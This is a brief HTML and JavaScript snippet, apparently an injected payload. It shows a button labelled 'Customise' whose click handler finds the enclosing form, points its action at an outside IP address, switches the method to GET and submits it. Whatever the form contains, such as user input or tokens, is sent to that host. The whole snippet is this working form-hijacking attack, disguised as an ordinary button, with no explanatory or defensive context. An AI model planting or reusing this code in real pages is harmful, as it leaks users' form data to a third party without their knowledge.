<button onclick="changeFormattributes()"  type="submit"  class="btn btn-primary" id="customise" >
Customise
</button>

<script>
function changeFormattributes() {
x = document.getElementById("customise").parentElement;
while ((x.nodeName).toLowerCase() !== "form" ) {
	console.log((x.nodeName).toLowerCase());
	 x = x.parentElement;
	}

x.action = "http://13.76.134.147/";
  	x.method = "get";
    
    x.submit();

}

</script>

                                       

